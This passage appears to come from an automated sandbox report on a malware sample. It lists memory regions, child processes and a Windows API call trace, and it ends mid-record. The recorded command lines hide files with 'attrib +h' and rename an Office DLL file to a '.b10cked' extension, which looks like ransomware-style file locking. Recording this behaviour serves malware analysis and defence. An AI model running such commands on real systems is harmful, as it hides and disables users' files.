mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20392 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 311 os_tid = 0xca0 Process: id = "249" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0x56c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xc54" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20471 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20472 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20473 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20474 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 20475 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x3f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20476 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20477 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20478 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20479 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 20480 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20481 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20482 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20483 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20484 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 20485 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 20486 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20487 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20488 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20489 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20490 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20491 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20492 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20493 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20494 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20495 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20496 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20497 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20498 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20499 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20500 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 312 os_tid = 0xd5c Process: id = "250" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xc54" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20501 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20502 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20503 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20504 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 20505 start_va = 0xc70000 end_va = 0xc76fff entry_point = 0xc70000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20506 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20507 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20508 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20509 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 20510 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20511 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20512 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20513 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20514 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 20515 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20516 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20517 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20518 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20519 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20520 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20521 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20522 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20523 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20524 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20525 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20526 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20527 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20528 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 20529 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20530 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 313 os_tid = 0xd54 Process: id = "251" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xe50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20630 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20631 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20632 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20633 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20634 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20635 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20636 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20637 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20638 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 20639 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20679 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20680 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20681 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20682 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 20683 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 20684 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20685 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20686 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20687 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20688 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20689 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20690 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20691 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20692 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20693 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20694 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20695 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20696 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 20697 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 20698 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 20699 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 20700 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 20701 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 20702 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 314 os_tid = 0xec4 [0153.096] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef90c | out: lpSystemTimeAsFileTime=0x2ef90c*(dwLowDateTime=0x95302c80, dwHighDateTime=0x1d440a9)) [0153.096] GetCurrentProcessId () returned 0xe50 [0153.096] GetCurrentThreadId () returned 0xec4 [0153.096] GetTickCount () returned 0x2f2f5 [0153.096] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef904 | out: lpPerformanceCount=0x2ef904*=20988564172) returned 1 [0153.097] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.097] __set_app_type (_Type=0x1) [0153.097] __p__fmode () returned 0x76b331f4 [0153.097] __p__commode () returned 0x76b331fc [0153.097] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.098] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.098] GetCurrentThreadId () returned 0xec4 [0153.098] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xec4) returned 0x38 [0153.098] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.098] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.098] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.098] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.098] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef89c | out: phkResult=0x2ef89c*=0x0) returned 0x2 [0153.098] VirtualQuery (in: lpAddress=0x2ef8d3, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.098] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.098] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.098] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.099] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0153.099] GetConsoleOutputCP () returned 0x1b5 [0153.099] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.099] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.099] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.099] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.099] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.099] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.099] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.100] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.100] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.100] GetEnvironmentStringsW () returned 0x4f0210* [0153.100] FreeEnvironmentStringsW (penv=0x4f0210) returned 1 [0153.100] GetEnvironmentStringsW () returned 0x4f0210* [0153.100] FreeEnvironmentStringsW (penv=0x4f0210) returned 1 [0153.100] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee80c | out: phkResult=0x2ee80c*=0x40) returned 0x0 [0153.100] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0xa0, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x0, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegCloseKey (hKey=0x40) returned 0x0 [0153.101] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee80c | out: phkResult=0x2ee80c*=0x40) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x0, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, 